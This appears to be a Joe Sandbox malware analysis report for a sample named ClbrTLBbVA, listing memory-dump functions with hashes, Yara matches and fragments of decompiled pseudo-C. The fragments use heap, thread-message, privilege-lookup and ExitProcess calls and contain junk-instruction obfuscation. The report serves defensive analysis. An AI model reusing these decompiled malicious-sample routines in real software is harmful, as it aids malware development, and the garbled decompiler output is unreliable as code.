                                        • Opcode Fuzzy Hash: 586d868c8a1fe8ae347353fdebda7506de9c2f49ebf67a806d4c6713cc505b8d
                                        • Instruction Fuzzy Hash: 099002A134100442D10065994815B070009E7E1341F52C019E2054554DC659DC527166
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 016E9860 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.346103337.0000000001680000.00000040.00001000.00020000.00000000.sdmp, Offset: 01680000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_1680000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0
                                        • Opcode ID: f56575c2863b9b17b72afff29993acf0ced3ba63c8aeac65ad13e2f4adb15f10
                                        • Instruction ID: c77ac8979990024afd34a851bd23d57a2516f473520fdfda4968e7867e95ae2a
                                        • Opcode Fuzzy Hash: f56575c2863b9b17b72afff29993acf0ced3ba63c8aeac65ad13e2f4adb15f10
                                        • Instruction Fuzzy Hash: 0190027120100413D11165994905707000DA7D0281F92C416A1414558DD6969952B161
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 016E9840 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.346103337.0000000001680000.00000040.00001000.00020000.00000000.sdmp, Offset: 01680000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_1680000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0
                                        • Opcode ID: 6e03ff6baa0ace144170a55bc9588cc44977cc9678721577e24eb00ddb70c923
                                        • Instruction ID: 647b83c3585dd8ccde98bff3e62eb0a215c6c75fdd1df0d6ac55bb7f154fe0f8
                                        • Opcode Fuzzy Hash: 6e03ff6baa0ace144170a55bc9588cc44977cc9678721577e24eb00ddb70c923
                                        • Instruction Fuzzy Hash: 5A900261242041525545B5994805607400AB7E0281792C016A2404950CC566A856F661
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 016E98F0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.346103337.0000000001680000.00000040.00001000.00020000.00000000.sdmp, Offset: 01680000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_1680000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0
                                        • Opcode ID: 1aac55572d145b262c6273b83997ef563877754c985d7f157b4348bba6c04ab9
                                        • Instruction ID: 92855ff001a611d6184ee0ddff7a72f7c5f9253636cdc67cfa246055b8b03f73
                                        • Opcode Fuzzy Hash: 1aac55572d145b262c6273b83997ef563877754c985d7f157b4348bba6c04ab9
                                        • Instruction Fuzzy Hash: 5590026160100502D10175994805717000EA7D0281F92C026A2014555ECA659992B171
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 016E9710 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.346103337.0000000001680000.00000040.00001000.00020000.00000000.sdmp, Offset: 01680000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_1680000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0
                                        • Opcode ID: 5c398f3d8aef367380972797b18c37693a87f5b6799b32d1105b12a4f4a808fa
                                        • Instruction ID: 0d492feaa30c9c623d54074a46eb2e76e982fc3ddcf3e0f548655cb0148ca663
                                        • Opcode Fuzzy Hash: 5c398f3d8aef367380972797b18c37693a87f5b6799b32d1105b12a4f4a808fa
                                        • Instruction Fuzzy Hash: 4590027120100402D10069D958097470009A7E0341F52D015A6014555EC6A598917171
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 016E97A0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.346103337.0000000001680000.00000040.00001000.00020000.00000000.sdmp, Offset: 01680000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_1680000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0
                                        • Opcode ID: 0e917dc5659885faeededbba5d1e671bc2e0c16a97b311c6162dda6a51eaf3d7
                                        • Instruction ID: 742d9ef300e9282a588666c1398af77a228bb1586d583254f9d9d0b2d8a9dd09
                                        • Opcode Fuzzy Hash: 0e917dc5659885faeededbba5d1e671bc2e0c16a97b311c6162dda6a51eaf3d7
                                        • Instruction Fuzzy Hash: 8090026130100003D140759958197074009F7E1341F52D015E1404554CD95598567262
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 016E9780 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.346103337.0000000001680000.00000040.00001000.00020000.00000000.sdmp, Offset: 01680000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_1680000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0
                                        • Opcode ID: d18939aed5bb9884c627541f3b7eb411767465cb324e10d4451d16d5df4440bf
                                        • Instruction ID: a9b89b06606bd9530c13335831596269f3beb0c33f209629005cca176a7f60da
                                        • Opcode Fuzzy Hash: d18939aed5bb9884c627541f3b7eb411767465cb324e10d4451d16d5df4440bf
                                        • Instruction Fuzzy Hash: B490026921300002D1807599580970B0009A7D1242F92D419A1005558CC95598697361
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 016E9660 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.346103337.0000000001680000.00000040.00001000.00020000.00000000.sdmp, Offset: 01680000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_1680000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0
                                        • Opcode ID: 1e61d4f3f6869fb0b1e849b97db804833eeca9c12e3faef189874122d5f8251e
                                        • Instruction ID: ccd3dd1b05f7fa0b2f1a9b172701d2f2d1e22d02bd175f32543cdf578b4431c2
                                        • Opcode Fuzzy Hash: 1e61d4f3f6869fb0b1e849b97db804833eeca9c12e3faef189874122d5f8251e
                                        • Instruction Fuzzy Hash: 2D90027120100802D1807599480574B0009A7D1341F92C019A1015654DCA559A5977E1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 016E9A50 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.346103337.0000000001680000.00000040.00001000.00020000.00000000.sdmp, Offset: 01680000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_1680000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0
                                        • Opcode ID: fdee4f365d334ff750eec3e990d3dcb051cee35d21608c166b2f6f0eec9bbf04
                                        • Instruction ID: 564b67d05f7ea1827e9b4608d4c401e4b29ed44b1b940544e28d76f26e0ee68b
                                        • Opcode Fuzzy Hash: fdee4f365d334ff750eec3e990d3dcb051cee35d21608c166b2f6f0eec9bbf04
                                        • Instruction Fuzzy Hash: 7990026121180042D20069A94C15B070009A7D0343F52C119A1144554CC95598617561
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 016E9A20 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.346103337.0000000001680000.00000040.00001000.00020000.00000000.sdmp, Offset: 01680000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_1680000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0
                                        • Opcode ID: d213f64e39061c2f662cdb66165a7a6fe077c1e2d49313aec2a634b753673d8a
                                        • Instruction ID: e16d09883ee40a8aaca6802c27297e561ae2b42873e180b6f045fa02a6b61a04
                                        • Opcode Fuzzy Hash: d213f64e39061c2f662cdb66165a7a6fe077c1e2d49313aec2a634b753673d8a
                                        • Instruction Fuzzy Hash: 7990026160100042414075A98C45A074009BBE1251752C125A1988550DC599986576A5
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 016E9A00 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.346103337.0000000001680000.00000040.00001000.00020000.00000000.sdmp, Offset: 01680000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_1680000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0
                                        • Opcode ID: d0f9d09ed203e6c8621bff7db7903089423d2869800d8bb82723c2a4792d21ba
                                        • Instruction ID: a0e458de033e9bed3448afb1284c89f4836004665535238fac641f92ac11c6f1
                                        • Opcode Fuzzy Hash: d0f9d09ed203e6c8621bff7db7903089423d2869800d8bb82723c2a4792d21ba
                                        • Instruction Fuzzy Hash: C490027120140402D10065994C1570B0009A7D0342F52C015A2154555DC665985175B1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 016E96E0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.346103337.0000000001680000.00000040.00001000.00020000.00000000.sdmp, Offset: 01680000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_1680000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0
                                        • Opcode ID: 1404bfc890464cf4c7a80c4c54e181d6b31c48c0aff3d0e8b35c9447ffc4f7c0
                                        • Instruction ID: 75e7e1d350f2581207a57271e8d4852e220c3abb7c5ba1c00b34674327c856dd
                                        • Opcode Fuzzy Hash: 1404bfc890464cf4c7a80c4c54e181d6b31c48c0aff3d0e8b35c9447ffc4f7c0
                                        • Instruction Fuzzy Hash: 6490027120108802D1106599880574B0009A7D0341F56C415A5414658DC6D598917161
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00409AB0 Relevance: .1, Instructions: 92COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 66%
                                        			E00409AB0(intOrPtr* _a4) {
				intOrPtr _v8;
				char _v24;
				char _v284;
				char _v804;
				char _v840;
				void* __ebx;
				void* _t24;
				void* _t31;
				void* _t33;
				void* _t34;
				void* _t39;
				void* _t50;
				intOrPtr* _t52;
				void* _t53;
				void* _t54;
				void* _t55;
				void* _t56;

				_t52 = _a4;
				_t39 = 0; // executed
				_t24 = E00407EA0(_t52,  &_v24); // executed
				_t54 = _t53 + 8;
				if(_t24 != 0) {
					E004080B0( &_v24,  &_v840);
					_t55 = _t54 + 8;
					do {
						E0041BE10( &_v284, 0x104);
						E0041C480( &_v284,  &_v804);
						_t56 = _t55 + 0x10;
						_t50 = 0x4f;
						while(1) {
							_t31 = E00414DF0(E00414D90(_t52, _t50),  &_v284);
							_t56 = _t56 + 0x10;
							if(_t31 != 0) {
								break;
							}
							_t50 = _t50 + 1;
							if(_t50 <= 0x62) {
								continue;
							} else {
							}
							goto L8;
						}
						_t9 = _t52 + 0x14; // 0xffffe045
						 *(_t52 + 0x474) =  *(_t52 + 0x474) ^  *_t9;
						_t39 = 1;
						L8:
						_t33 = E004080E0( &_v24,  &_v840);
						_t55 = _t56 + 8;
					} while (_t33 != 0 && _t39 == 0);
					_push( &_v24);
					_push(_t52); // executed
					_t34 = E00408160(_t39); // executed
					if(_t39 == 0) {
						asm("rdtsc");
						asm("rdtsc");
						_v8 = _t34 - 0 + _t34;
						 *((intOrPtr*)(_t52 + 0x55c)) =  *((intOrPtr*)(_t52 + 0x55c)) + 0xffffffba;
					}
					 *((intOrPtr*)(_t52 + 0x31)) =  *((intOrPtr*)(_t52 + 0x31)) + _t39;
					_t20 = _t52 + 0x31; // 0x5608758b
					 *((intOrPtr*)(_t52 + 0x32)) =  *((intOrPtr*)(_t52 + 0x32)) +  *_t20 + 1;
					return 1;
				} else {
					return _t24;
				}
			}




















                                        0x00409abb
                                        0x00409ac3
                                        0x00409ac5
                                        0x00409aca
                                        0x00409acf
                                        0x00409ae2
                                        0x00409ae7
                                        0x00409af0
                                        0x00409afc
                                        0x00409b0f
                                        0x00409b14
                                        0x00409b17
                                        0x00409b20
                                        0x00409b32
                                        0x00409b37
                                        0x00409b3c
                                        0x00000000
                                        0x00000000
                                        0x00409b3e
                                        0x00409b42
                                        0x00000000
                                        0x00000000
                                        0x00409b44
                                        0x00000000
                                        0x00409b42
                                        0x00409b46
                                        0x00409b49
                                        0x00409b4f
                                        0x00409b51
                                        0x00409b5c
                                        0x00409b61
                                        0x00409b64
                                        0x00409b6f
                                        0x00409b70
                                        0x00409b71
                                        0x00409b7c
                                        0x00409b7e
                                        0x00409b84
                                        0x00409b88
                                        0x00409b8b
                                        0x00409b8b
                                        0x00409b92
                                        0x00409b95
                                        0x00409b9a
                                        0x00409ba7
                                        0x00409ad6
                                        0x00409ad6
                                        0x00409ad6

                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.345448384.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_ClbrTLBbVA.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: bf70d19deb8b7dbf65a1c14f2d3141162741e3067e6603a799ea80fa30cdc1c2
                                        • Instruction ID: 0b46cc9625fd597f0f1293e0fe630cc8c1f9f1e3f005c30533d49d025d22dd75
                                        • Opcode Fuzzy Hash: bf70d19deb8b7dbf65a1c14f2d3141162741e3067e6603a799ea80fa30cdc1c2
                                        • Instruction Fuzzy Hash: 97210AB2D4020857CB25D674AD52BFF73BCAB54314F04007FE949A3182F638BE498BA5
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0041A663 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42memoryCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        C-Code - Quality: 27%
                                        			E0041A663(void* __eax, void* __edi, void* __esi, void* __eflags, void* _a4, long _a8, void* _a12, long _a16, long _a20) {
				intOrPtr _v0;
				void* __ebp;
				void* _t17;
				void* _t19;

				asm("in eax, 0xd1");
				asm("cmc");
				asm("sbb bl, 0x5");
				_push(__edi);
				asm("lahf");
				asm("cld");
				if(__eflags >= 0) {
					 *((intOrPtr*)(__eax + 0x50)) =  *((intOrPtr*)(__eax + 0x50)) + _t19;
					E0041AF60(__edi);
					_t6 =  &_a12; // 0x414536
					_t17 = RtlAllocateHeap( *_t6, _a16, _a20); // executed
					return _t17;
				} else {
					__eflags = __eax;
					__ebp = __esp;
					_t9 = _v0 + 0xc74; // 0xc74
					E0041AF60(__edi, _v0, _t9,  *((intOrPtr*)(_v0 + 0x10)), 0, 0x35, _t9) = _a8;
					__esp = __esp + 0x14;
					__eax = RtlFreeHeap(_a4, _a8, _a12); // executed
					__ebp = __ebp;
					return __eax;
				}
			}







                                        0x0041a664
                                        0x0041a666
                                        0x0041a667
                                        0x0041a66a
                                        0x0041a66b
                                        0x0041a66c
                                        0x0041a66d
                                        0x0041a644
                                        0x0041a647
                                        0x0041a652
                                        0x0041a65d
                                        0x0041a661
                                        0x0041a66f
                                        0x0041a66f
                                        0x0041a671
                                        0x0041a67f
                                        0x0041a68f
                                        0x0041a695
                                        0x0041a69d
                                        0x0041a6a0
                                        0x0041a6a1
                                        0x0041a6a1

                                        APIs
                                        • RtlAllocateHeap.NTDLL(6EA,?,00414CAF,00414CAF,?,00414536,?,?,?,?,?,00000000,00409CF3,?), ref: 0041A65D
                                        • RtlFreeHeap.NTDLL(00000060,00409CF3,?,?,00409CF3,00000060,00000000,00000000,?,?,00409CF3,?,00000000), ref: 0041A69D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.345448384.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_ClbrTLBbVA.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$AllocateFree
                                        • String ID: 6EA
                                        • API String ID: 2488874121-1400015478
                                        • Opcode ID: f4c3275209d0971f64b36cd03effd05cc2a23248144a06253597ea3c267f3f1d
                                        • Instruction ID: bbafbadddf725682c80fc239ddc996a922e6f592a3fa0a8ee56e2feefdd9d220
                                        • Opcode Fuzzy Hash: f4c3275209d0971f64b36cd03effd05cc2a23248144a06253597ea3c267f3f1d
                                        • Instruction Fuzzy Hash: 15F0C2B81042455FDB10EF69DC818AB33A5FF85718B14890AF84D83303D234D46A8AB1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0041A630 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 13 41a630-41a646 14 41a64c-41a661 RtlAllocateHeap 13->14 15 41a647 call 41af60 13->15 15->14
                                        APIs
                                        • RtlAllocateHeap.NTDLL(6EA,?,00414CAF,00414CAF,?,00414536,?,?,?,?,?,00000000,00409CF3,?), ref: 0041A65D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.345448384.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_ClbrTLBbVA.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AllocateHeap
                                        • String ID: 6EA
                                        • API String ID: 1279760036-1400015478
                                        • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                        • Instruction ID: b63900df46c74d48569035b2bcc9be016157083d4ef88d1b541c797289a4eec1
                                        • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                        • Instruction Fuzzy Hash: 46E012B1200208ABDB14EF99CC41EA777ACEF88664F158559BA085B242C630F9118AB0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00408310 Relevance: 1.6, APIs: 1, Instructions: 55threadwindowCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 211 408310-40835a call 41be60 call 41ca00 call 40acf0 call 414e50 221 40835c-40836e PostThreadMessageW 211->221 222 40838e-408392 211->222 223 408370-40838a call 40a480 221->223 224 40838d 221->224 223->224 224->222
                                        C-Code - Quality: 82%
                                        			E00408310(void* __eflags, intOrPtr _a4, long _a8) {
				char _v67;
				char _v68;
				void* _t12;
				intOrPtr* _t13;
				int _t14;
				long _t21;
				intOrPtr* _t25;
				void* _t26;
				void* _t30;

				_t30 = __eflags;
				_v68 = 0;
				E0041BE60( &_v67, 0, 0x3f);
				E0041CA00( &_v68, 3);
				_t12 = E0040ACF0(_t30, _a4 + 0x1c,  &_v68); // executed
				_t13 = E00414E50(_a4 + 0x1c, _t12, 0, 0, 0xc4e7b6d6);
				_t25 = _t13;
				if(_t25 != 0) {
					_t21 = _a8;
					_t14 = PostThreadMessageW(_t21, 0x111, 0, 0); // executed
					_t32 = _t14;
					if(_t14 == 0) {
						_t14 =  *_t25(_t21, 0x8003, _t26 + (E0040A480(_t32, 1, 8) & 0x000000ff) - 0x40, _t14);
					}
					return _t14;
				}
				return _t13;
			}












                                        0x00408310
                                        0x0040831f
                                        0x00408323
                                        0x0040832e
                                        0x0040833e
                                        0x0040834e
                                        0x00408353
                                        0x0040835a
                                        0x0040835d
                                        0x0040836a
                                        0x0040836c
                                        0x0040836e
                                        0x0040838b
                                        0x0040838b
                                        0x00000000
                                        0x0040838d
                                        0x00408392

                                        APIs
                                        • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.345448384.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_ClbrTLBbVA.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: MessagePostThread
                                        • String ID:
                                        • API String ID: 1836367815-0
                                        • Opcode ID: eeb461d9a93cfa80389428809ed4c10d2a707c26e4e5d313531af448f679d8da
                                        • Instruction ID: fe648ddaccc693dff6b318d6e20673cc1517f8ca6da234ac2c2ad493b9bfa733
                                        • Opcode Fuzzy Hash: eeb461d9a93cfa80389428809ed4c10d2a707c26e4e5d313531af448f679d8da
                                        • Instruction Fuzzy Hash: FF018431A8032C76E721A6959C43FFE776C5B40F54F05011AFF04BA1C2EAA8690546EA
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 004082D4 Relevance: 1.6, APIs: 1, Instructions: 50threadwindowCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 227 4082d4-4082d7 228 4082d1-4082d2 227->228 229 4082d9 227->229 230 4082dc-4082dd 229->230 231 40832e-40835a call 41ca00 call 40acf0 call 414e50 229->231 230->231 238 40835c-40836e PostThreadMessageW 231->238 239 40838e-408392 231->239 240 408370-40838a call 40a480 238->240 241 40838d 238->241 240->241 241->239
                                        C-Code - Quality: 65%
                                        			E004082D4(signed int __eax, void* __edi) {
				void* __esi;
				signed char _t4;

				_t4 = __eax & 0x0000009d;
				if(__edi + 1 != 0) {
					return _t4;
				} else {
					asm("loopne 0x55");
					asm("int3");
					asm("ficomp word [ebx+0x3d]");
					__esi = __eax;
					__eax = E0041B750(__ecx);
					__eax = __eax + __esi + 0x1000;
					__esi = __esi;
					return __eax;
				}
			}





                                        0x004082d4
                                        0x004082d7
                                        0x004082d2
                                        0x004082d9
                                        0x004082d9
                                        0x004082dc
                                        0x004082dd
                                        0x004082ee
                                        0x004082f0
                                        0x004082f5
                                        0x004082fc
                                        0x004082fd
                                        0x004082fd

                                        APIs
                                        • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.345448384.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_ClbrTLBbVA.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: MessagePostThread
                                        • String ID:
                                        • API String ID: 1836367815-0
                                        • Opcode ID: b10fabcb32db71a5b7eea36fe1392860f60038128f8c22098197d1e06333c4eb
                                        • Instruction ID: c56991214c4ec934080db5ba8cc66c5b0c1f150242ce01cb245a4655f8ad6c1a
                                        • Opcode Fuzzy Hash: b10fabcb32db71a5b7eea36fe1392860f60038128f8c22098197d1e06333c4eb
                                        • Instruction Fuzzy Hash: 39F02831A8021876EB106A419D43FBF7318AB80F54F15406EFE04BA1C2E9BD295602EA
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0041A7C1 Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 269 41a7c1-41a7ea call 41af60 271 41a7ef-41a804 LookupPrivilegeValueW 269->271
                                        C-Code - Quality: 37%
                                        			E0041A7C1(void* __eax, void* __ebx, void* __esi, intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
				char _v1;
				int _t12;
				void* _t18;

				asm("in al, dx");
				asm("out 0xb2, eax");
				_push( &_v1);
				E0041AF60(_t18, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46, 0xec8b557e);
				_t12 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
				return _t12;
			}






                                        0x0041a7c2
                                        0x0041a7cc
                                        0x0041a7d0
                                        0x0041a7ea
                                        0x0041a800
                                        0x0041a804

                                        APIs
                                        • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1D2,0040F1D2,0000003C,00000000,?,00409D65), ref: 0041A800
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.345448384.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_ClbrTLBbVA.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: LookupPrivilegeValue
                                        • String ID:
                                        • API String ID: 3899507212-0
                                        • Opcode ID: 36880e488c94ab2ef659b49dd10dee1059cd8d93b727595a6230eda0b513fbb1
                                        • Instruction ID: d7fd77a1f58c8e657c7d4f6a89aa0069368a39e55173c9c77418211e55863ec0
                                        • Opcode Fuzzy Hash: 36880e488c94ab2ef659b49dd10dee1059cd8d93b727595a6230eda0b513fbb1
                                        • Instruction Fuzzy Hash: 96E0A0B16001186BC710DF58CC80EE737A99F48350F1181A4B94CAB241C535D85287A1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0041A670 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 272 41a670-41a686 273 41a68c-41a6a1 RtlFreeHeap 272->273 274 41a687 call 41af60 272->274 274->273
                                        APIs
                                        • RtlFreeHeap.NTDLL(00000060,00409CF3,?,?,00409CF3,00000060,00000000,00000000,?,?,00409CF3,?,00000000), ref: 0041A69D
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.345448384.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_ClbrTLBbVA.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: FreeHeap
                                        • String ID:
                                        • API String ID: 3298025750-0
                                        • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                        • Instruction ID: 086aab0bc8c344d6c60c9bbd5a0512cabfd8005857d16272e4a7e29987098a06
                                        • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                        • Instruction Fuzzy Hash: C1E012B1200208ABDB18EF99CC49EA777ACEF88764F118559BA085B242C630E9108AB0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0041A7D0 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 275 41a7d0-41a7e9 276 41a7ef-41a804 LookupPrivilegeValueW 275->276 277 41a7ea call 41af60 275->277 277->276
                                        APIs
                                        • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1D2,0040F1D2,0000003C,00000000,?,00409D65), ref: 0041A800
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.345448384.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_ClbrTLBbVA.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: LookupPrivilegeValue
                                        • String ID:
                                        • API String ID: 3899507212-0
                                        • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                        • Instruction ID: 3f9aab8e47c10174471559fee5d267dc63a882ce56825bdd12c8e63267ac542a
                                        • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                        • Instruction Fuzzy Hash: 23E01AB12002086BDB10DF49CC85EE737ADEF88654F118155BA0C57241C934E8118BF5
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0041A6A2 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 100%
                                        			E0041A6A2(intOrPtr _a4, int _a8) {
				signed int _v117;
				intOrPtr* _t11;
				signed int _t13;
				void* _t15;
				intOrPtr* _t16;

				 *_t16 = 0x87478d76;
				 *_t11 =  *_t11 - _t13;
				_v117 = _v117 & _t13;
				E0041AF60(_t15, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_a4 + 0xa14)), 0, 0x36, _t16);
				ExitProcess(_a8);
			}








                                        0x0041a6a7
